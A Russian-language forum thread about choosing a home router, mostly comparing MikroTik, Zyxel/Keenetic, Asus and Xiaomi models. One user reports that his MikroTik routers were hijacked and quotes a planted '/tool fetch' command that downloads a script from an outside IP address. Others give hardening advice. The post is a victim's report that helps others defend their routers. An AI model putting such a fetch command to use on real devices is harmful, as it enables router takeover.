Посоветуйте роутер для дома (Голосование)

[kol2000]

К вопросу об актуальности 5Жы на сегодняшний день)

[tier]

И что по вашему означают такие графики?

[kol2000]

И что по вашему означают такие графики?

Преимущество использования на данный момент именно 5Жы в муравейниках: не мешает никто)

[mimicria]

Мда, на 2.4 у меня картинка безрадостная.

[kol2000]

О том и речь)

[mimicria]

Начал читать отзывы на роутеры, больше расстроился.
Zyxel надежные и легко настраиваются, но никакущие в плане скорости/мощности вафли
Asus (смотрел хваленый N56U) тоже проблемы с вафлей и обновлениями
Xiaomi танцы с прошивками, греется, нестабильный
Mikrotik помимо хвалебных од имеет проблемы со скоростью вафли (https://forum.mikrotik.com/viewtopic.php?t=113830), да и вообще пишут, что в последнее время качество сборки (пайки) сильно упало.

В связи с этим вопрос остается открытым.
Сам посматриваю в сторону Tenda AC6, наверняка тоже проблемный (прошивка точно), но и цена 1,5к всего, а хотелось бы стабильный и быстрый.

[Degun]

Mikrotik помимо хвалебных од имеет проблемы со скоростью вафли (https://forum.mikrotik.com/viewtopic.php?t=113830), да и вообще пишут, что в последнее время качество сборки (пайки) сильно упало.

Если телефон Xiaomi 3S то могут быть проблемы. Там стоит Квалкомовский чип в работе которого есть определенная несовместимость с микротами. Максимальная скорость вайфая 20/30 Мбит. Наблюдается проблема только с этой серией телефонов (хотя может еще где-то в модельном ряду хиаоми стоит та же связка чип-конфигурация). На скорость открытия, просмотра видео с ютуба не влияет, но гигабайты с телефона (если такая нужда возникнет) качать будет неудобно.

Кроме как с этим телом проблем с вайфем ни у кого из домашних/гостей не наблюдалось. Средняя скорость 5Джи 160/160 Мбит на стареньком Ipad Air больше у меня дома пока с поддержкой АС ничего нет.

[mimicria]

Сомнительно, что такая проблема только с Сяоми




Это только касаемо hap ac, к другим моделям тоже полно плохих отзывов

[Degun]

Насколько я знаком с ситуацией: проблемы только из-за определенных чипов Квалкома, наблюдались в основном только с телефонами Сяоми. Все остальное что указано выше это от богатства настроек вафли у микротиков: люди ставят массу разных галочек не совсем понимая что они делают или даже не вчитываясь в описание того что делают, в итоге ловят несовместимость и сами ухудшают качество сигнала Вайфай. Конечно не всегда только лишь в этом причина, но очень часто именно в этом - делают наобум и совсем не то.


З.Ы. Это я как владелец Hap ас говорю.

[mimicria]

Не буду спорить, но тратить время на курение форумов по настройке каждой мелочи тоже совсем не хочется.
Мне надо то всего ничего, пробросить порты и чтоб стабильно работал на хорошей скорости.

[Degun]

Я не буду агитировать за микротов, в конце концов, латыши мне за это не платят ))) Берите то что вам больше понравится по отзывам и по вашим потребностям. Главное чтобы вас ваш выбор полностью устраивал.

Но если надумаете вдруг брать именно такой вариант, то можете ознакомится с этим:
https://mysku.ru/blog/ebay/50411.html

Сами можете прикинуть сложна настройка сети или скорее всего справитесь с задачей.

[mimicria]

Берите то

"То" не находится, вот где засада((

[Degun]

Я там выше дополнил коммент на всякий случай

[tier]

И что по вашему означают такие графики?

Преимущество использования на данный момент именно 5Жы в муравейниках: не мешает никто)

Никто не мешает, потому что до вас никто не добивает через стенки. До соседней комнаты и ваш рутер не добьет, скорее всего

[kol2000]

Никто не мешает, потому что до вас никто не добивает через стенки. До соседней комнаты и ваш рутер не добьет, скорее всего

"Рутер" бьет через три стенки в подъезд очень даже легко. Руки не доходят отсканировать план квартиры и пройтись со смартом составить карту покрытия как в 2.4, так и в 5 ГГц. Оно, в принципе, мне уже и не надо, если только сюда для форума, ибо вся квартира (трёха) покрыта легко. Единственное на балкон (наиболее удалённая точка) не ходил замерять, ибо там сейчас срач и наличие вафли пока не актуально. Ещё момент что заметил, так это что в подъезде вафля иной раз отваливается от Asus RT-AC58U, с 1200+ таких проблем не было. Видимо сигнал чуть послабее. Но тоже решаемо: надо роутер повыше поднять ибо на полу стоит сейчас. Единственно что не устраивает в нынешнем Асусе так то, что приоритеты на клиентов выставлять нельзя. Но это, по сути, придирка уже.

[tier]

А да, я вспомнил, у вас же волшебный железобетон в стенках...
А чего рутер в кавычках?

[kol2000]

А чего рутер в кавычках?

Ну мы же на русском языке здесь общаемся. Поэтому вместо роутер и написал на вашем суржике "рутер".

[tier]

Роутер? Русское слово? 

[Degun]

Ну вот и появился в Орле тот самый вариант, который наверное максимально хорош как для дома, так и для малого офиса.

Мощный проц (4 поточный), отлично поддерживает аппаратное шифрование, не захлебывается в туннелях, Поддерживает WiFi АС2, двухдиапазонный (5 ГГц, 2.4 ГГц). В общем на мой взгляд сказка Изготовитель рекомендует цену 3500, но пока он относительно новый то продавцы ставят 4000+

http://bagiracomp.ru/op.asp?noredirect=1&dir=!Nix/0000341XXX/341344


Ну и ссылка на тесты:
https://weblance.com.ua/381-mikrotik-ustranili-problemy-proizvoditelnosti-hap-ac2-testiruem-rabotu-wi-fi-posle-obnovleniya-na-routeros-6423.html

https://weblance.com.ua/374-obzor-hap-ac2-rbd52g-5hacd2hnd-tc-odin-v-pole-voin-i-alternativa-hex-hap-ac.html

В общем очень интересная новинка и для дома и для бизнеса.

[mimicria]

Вот теперь такой же, только чтобы настраивался в пару кликов)

[Degun]

Вот теперь такой же, только чтобы настраивался в пару кликов)

Он из коробки будет работать с большинством операторов (например с РС). Там базовая конфигурация уже предустановлена - втыкаешь кабели, (меняешь имяпользователя/пароль админа и все. Если провайдер типа билайна (через туннель работает), то тогда да - придется 1 раз разобраться, но манов в инете вагон - тупо тыкая по инструкции настроит даже совершенно неподготовленный человек.

[Pincher]

Ну вот и появился в Орле тот самый вариант, который наверное максимально хорош как для дома, так и для малого офиса.

Мощный проц (4 поточный), отлично поддерживает аппаратное шифрование, не захлебывается в туннелях, Поддерживает WiFi АС2, двухдиапазонный (5 ГГц, 2.4 ГГц). В общем на мой взгляд сказка Изготовитель рекомендует цену 3500, но пока он относительно новый то продавцы ставят 4000+

http://bagiracomp.ru/op.asp?noredirect=1&dir=!Nix/0000341XXX/341344


Ну и ссылка на тесты:
https://weblance.com.ua/381-mikrotik-ustranili-problemy-proizvoditelnosti-hap-ac2-testiruem-rabotu-wi-fi-posle-obnovleniya-na-routeros-6423.html

https://weblance.com.ua/374-obzor-hap-ac2-rbd52g-5hacd2hnd-tc-odin-v-pole-voin-i-alternativa-hex-hap-ac.html

В общем очень интересная новинка и для дома и для бизнеса.

Эх, если бы гигабитные порты еще были бы.

[KeyMS]

Ксиаоми в Орле стоит 2000 р в официальном магазине Больше для дома нафиг не нужно. Я уже собирался себе менять свой zyxel giga 2. А он после перепрошивки перестал глючить ... Оставил пока его.

[kol2000]

Ксиаоми в Орле стоит 2000 р в официальном магазине Больше для дома нафиг не нужно. Я уже собирался себе менять свой zyxel giga 2. А он после перепрошивки перестал глючить ... Оставил пока его.

Понятно, что сяоми лудше, но если ты про такой, то: а) там нет 5 ГГц; б) нет гигабитных портов.

[KeyMS]

Разве в ксиаоми нет 5 ГГц ?

[kol2000]

В Шеоами по ссылке - нет.

[mimicria]

Эх, если бы гигабитные порты еще были бы.

В описании порты гигабитные.

Он из коробки будет работать...

Судя по отзывам, с вафлей там тоже из коробки косяки, новые прошивки вроде как решают, но это опять танцы...

[KaWaii]

Xiaomi Mi WiFi Router 3 стоит дома. после дешевых зухелей и не очень дешевых асусов- доволен как слон.

[jrf_cat]

Вот теперь такой же, только чтобы настраивался в пару кликов)

Ну так есть б-жественные зюксели/кинетики. Там тебе и 2 диапазона, и гигабитные порты, и вообще полный центр удовольствий.

[Degun]

Он из коробки будет работать...

Судя по отзывам, с вафлей там тоже из коробки косяки, новые прошивки вроде как решают, но это опять танцы...

Ну, если нажатие 1 кнопки «Download&Install Firmware» танцы, то да - возможно придётся танцевать Но танец будет не очень длинный )))

[KeyMS]

Вот теперь такой же, только чтобы настраивался в пару кликов)

Ну так есть б-жественные зюксели/кинетики. Там тебе и 2 диапазона, и гигабитные порты, и вообще полный центр удовольствий.

у меня кинетик гига 2. Очень неприхотливый и надежный девайс. Правда у меня только 2.4, но у меня нет ни одного девайса в 5 ГГц, так, что я не плачу. Но его для дома за глаза хватает. А вот для каких то хитроумных сетевых решений действительно сильное решение роутер с ОС от микротик.

[jrf_cat]

у меня кинетик гига 2. Очень неприхотливый и надежный девайс. Правда у меня только 2.4, но у меня нет ни одного девайса в 5 ГГц, так, что я не плачу. Но его для дома за глаза хватает. А вот для каких то хитроумных сетевых решений действительно сильное решение роутер с ОС от микротик.

У меня ультра первая, 5ГГц есть в ней, они мне все таки нужны. Тоже горя не знаю - настроил влегкую и забыл. До этого была вива(2,4 только, но с гигабитными портами) - но царствие ей небесное, спасибо нбн, умертвили зверушку электротоком.

[mimicria]

Пожалуй, возьму всё-таки extra2

[DimaN]

Ну вот и появился в Орле тот самый вариант, который наверное максимально хорош как для дома, так и для малого офиса.

Мощный проц (4 поточный), отлично поддерживает аппаратное шифрование, не захлебывается в туннелях, Поддерживает WiFi АС2, двухдиапазонный (5 ГГц, 2.4 ГГц). В общем на мой взгляд сказка Изготовитель рекомендует цену 3500, но пока он относительно новый то продавцы ставят 4000+

http://bagiracomp.ru/op.asp?noredirect=1&dir=!Nix/0000341XXX/341344


Ну и ссылка на тесты:
https://weblance.com.ua/381-mikrotik-ustranili-problemy-proizvoditelnosti-hap-ac2-testiruem-rabotu-wi-fi-posle-obnovleniya-na-routeros-6423.html

https://weblance.com.ua/374-obzor-hap-ac2-rbd52g-5hacd2hnd-tc-odin-v-pole-voin-i-alternativa-hex-hap-ac.html

В общем очень интересная новинка и для дома и для бизнеса.

На прошлой неделе взломали Микротик в одной организации. Ну поугарал над ними немного, потому как там был открыт веб прокси, и айпишник уже фигурировал в открытом доступе в списках открытых анонимных прокси,  хотя пароль там был не особо сложный, но и не совсем простой.  Пришел домой дай думаю свой микротик проверю. И обана! То же самое! Те же настройки! Стоят левые ДНС, открыт веб прокси, настроены PPTP, L2TP и еще кажется SSTP сервера. Причем у меня подобрали пароль ко второму пользователю. То есть не admin. Толи используют какую то уязвимость, то ли как то еще взламывают.

[kol2000]

[Degun]

Ну вот и появился в Орле тот самый вариант, который наверное максимально хорош как для дома, так и для малого офиса.

Мощный проц (4 поточный), отлично поддерживает аппаратное шифрование, не захлебывается в туннелях, Поддерживает WiFi АС2, двухдиапазонный (5 ГГц, 2.4 ГГц). В общем на мой взгляд сказка Изготовитель рекомендует цену 3500, но пока он относительно новый то продавцы ставят 4000+

http://bagiracomp.ru/op.asp?noredirect=1&dir=!Nix/0000341XXX/341344


Ну и ссылка на тесты:
https://weblance.com.ua/381-mikrotik-ustranili-problemy-proizvoditelnosti-hap-ac2-testiruem-rabotu-wi-fi-posle-obnovleniya-na-routeros-6423.html

https://weblance.com.ua/374-obzor-hap-ac2-rbd52g-5hacd2hnd-tc-odin-v-pole-voin-i-alternativa-hex-hap-ac.html

В общем очень интересная новинка и для дома и для бизнеса.

На прошлой неделе взломали Микротик в одной организации. Ну поугарал над ними немного, потому как там был открыт веб прокси, и айпишник уже фигурировал в открытом доступе в списках открытых анонимных прокси,  хотя пароль там был не особо сложный, но и не совсем простой.  Пришел домой дай думаю свой микротик проверю. И обана! То же самое! Те же настройки! Стоят левые ДНС, открыт веб прокси, настроены PPTP, L2TP и еще кажется SSTP сервера. Причем у меня подобрали пароль ко второму пользователю. То есть не admin. Толи используют какую то уязвимость, то ли как то еще взламывают.

Дайка уточню: а IP\Service были ограничены только по локальным подсетям и доверенным IP или смотрели и принимали запросы от кого угодно? А Фаервалл был изменен от стандартной конфигурации? Порты 8291 (Винбокс), 80-й (http), 22-й (ssh) были открыты для всех извне?

И еще до кучи: версия прошивки какая?

[mimicria]

Даже в самых тупых роутерах есть ограничение на администрирование только по lan.

[Degun]

Даже в самых тупых роутерах есть ограничение на администрирование только по lan.

Да в том то и дело что есть, но частенько отключают/изменяют базовую конфигурацию (причем не всегда удачно с точки зрения безопасности), а потом почему-то такие роутеры взламывают. Если у него было управление ограничено по локальным подсетям и извне пара доверенных IP - уверен, что с ним бы такого не случилось. Кроме того, все же хотя бы раз в полгода желательно обновлять прошивку (у любых роутеров) так как уязвимости встречаются у всех - прошивки тоже люди пишут.

[DimaN]

Дайка уточню: а IP\Service были ограничены только по локальным подсетям и доверенным IP или смотрели и принимали запросы от кого угодно? А Фаервалл был изменен от стандартной конфигурации? Порты 8291 (Винбокс), 80-й (http), 22-й (ssh) были открыты для всех извне?

И еще до кучи: версия прошивки какая?

Там в организации настраивал не я, а достаточно шарящий специалист из другого города. Но по каким то причинам он забил на безопасность. Поэтому до взлома сервисы были доступны для всех. Естественно порты тоже были незакрыты. После взлома он закрыл доступ для всех кроме нескольких адресов. Вот прошивку не помню.
У меня дома не стояло задачи сильно закрываться. Да и интересно иногда с телефона подключиться посмотреть что там происходит, поэтому ограничит по адресам возможности не было. Самое интересное, что судя по логам, изменение настроек произошло от имени моего второго  пользователя. ТО есть получается это не стандартный брутфорс админа? Ели честно я и пароль на него забыл, возможно он был простой. Но сам факт подбора пароля на не админа наводит на разные мысли.

На домашнем роутере была версия по моему 6.40 сейчас обновил до 6.42.6.

Сегодня наткнулся на http://sysadmins.ru/post14013232.html

У меня тоже был такой косяк:
/tool fetch address=95.154.216.160 port=2007 src-path=/mikrotik.php mode=http

[DimaN]

Даже в самых тупых роутерах есть ограничение на администрирование только по lan.

Такой задачи у меня дома не было, а в организации есть свой админ, который на это подзабил, пока жареный петух не клюнул.

[DimaN]

Даже в самых тупых роутерах есть ограничение на администрирование только по lan.

Да в том то и дело что есть, но частенько отключают/изменяют базовую конфигурацию (причем не всегда удачно с точки зрения безопасности), а потом почему-то такие роутеры взламывают. Если у него было управление ограничено по локальным подсетям и извне пара доверенных IP - уверен, что с ним бы такого не случилось. Кроме того, все же хотя бы раз в полгода желательно обновлять прошивку (у любых роутеров) так как уязвимости встречаются у всех - прошивки тоже люди пишут.

У себя дома конфигурация была по умолчанию. Ничего не оключал. После взлома прошивку обновил.

[DimaN]

Если интересно могу скинуть лог, и взломанный конфиг.

[Degun]

Если интересно могу скинуть лог, и взломанный конфиг.

Да не нужно, дыра известная. Работало только со старыми версиями прошивки и с теми роутерами, в которых не стояло ограничение на коннекты извне и не были ограниченны сервисы. Если интересно то вот обзор как это технически делали:

https://habr.com/post/416067/

Я вообще всегда рекомендую отключать все сервисы которые не используются (особенно http, telnet, ftp и т.д.), отключить возможность удаленного управления извне, а самому для удаленки поднимать ВПН-туннель до своего роутера. С точки зрения безопасности такой подход к защите от взлома более правильный.


У меня еще в нагрузку в фаере ловушка стоит - все кто из инета ко мне стучат на порты 8291 и 22 - загоняет сразу в бан-лист на 14 дней. Стучат постоянно, можно сказать душевно - около 3000 банов за 30 дней.

[DimaN]

Я вообще всегда рекомендую отключать все сервисы которые не используются (особенно http, telnet, ftp и т.д.), отключить возможность удаленного управления извне, а самому для удаленки поднимать ВПН-туннель до своего роутера. С точки зрения безопасности такой подход к защите от взлома более правильный.

У меня еще в нагрузку в фаере ловушка стоит - все кто из инета ко мне стучат на порты 8291 и 22 - загоняет сразу в бан-лист на 14 дней. Стучат постоянно, можно сказать душевно - около 3000 банов за 30 дней.

Про ВПН приму к сведению, а про ловушку вообще потрясающий совет!!!

[RESOURS]

Обычному человеку не нужен такой продвинутый роутер, который нужно администрить каждый день, накатывать патчи, следить за профильными форумами и читать тома документации.
Чем ОС роутера сложнее, тем она дырявее. И незаметно для вас самих роутер превращается в рассыльщик спама, ddos-узел или узел какой-нибудь underground сети.
Я пользую ASUS RT-AC66 и проблем не знаю, все ненужное закрыто по-умолчанию, а с настройками справится любой.

[Degun]

Обычному человеку не нужен такой продвинутый роутер, который нужно администрить каждый день, накатывать патчи, следить за профильными форумами и читать тома документации.
Чем ОС роутера сложнее, тем она дырявее. И незаметно для вас самих роутер превращается в рассыльщик спама, ddos-узел или узел какой-нибудь underground сети.
Я пользую ASUS RT-AC66 и проблем не знаю, все ненужное закрыто по-умолчанию, а с настройками справится любой.

Админить, следить и проверять настройки безопасности нужно у ЛЮБОГО роутера вне зависимости от вендера, и ваш рт-ас66 не исключение.

Сходите поищите свой http://3wifi.stascorp.com/map и это далеко не самая полная база хакнутых роутеров. Не стоит думать, что если у вас «домашний» роутер то он не дырявый как решето.

[Degun]

Ребят, ребятушки... Тема называется посоветуйте "роутер-крепкий орешек". А голосовалка посоветуйте из того что уже куплено у большинства и неизвестно сколько стоит и кем подбиралось. Я один вижу подобные вещи?

Мысль твоя как туман в руках Самурая:
Скользит меж пальцев.
Занятие пустое - не поймать.

[BeZpredel]

Degun

.... посмотрит голосовалку и купит зуксель, а не микротик.

И правильно сделает.
Zyxel Keenetic .... решает все проблемы.
Микротик - ну уж нет. Туда же и TP-LINК с D-Link вместе. ASUS можно рассмотреть как варианты, ну лучше Zyxel

[kol2000]

Я в декабре менял старый Асус (NT-12) на новый (щас AC58U), из-за 5 Ггц вафли и гигабита лан, и ток третий нормально завелся и работает вот уже полгода как часы. Я знал, что такое возможно, поэтому и добил тему до победного конца =)

[BeZpredel]

BeZpredel Я для себя хотел понять, "Какая фирма-изготовитель вашего домашнего роутера?" и тема "Посоветуйте роутер для дома (Голосование)" с разным смыслом в итоге одно и тоже?
Просто для тех кто в не понял еще раз: дома TL-WR841N но его я не посоветую к покупке!

У меня Zyxel. Уже 8 лет... правда модели разные.. стараюсь не очень отставать от прогресса.
Голосовалка показывает что большинство всё таки предпочитают Zyxel.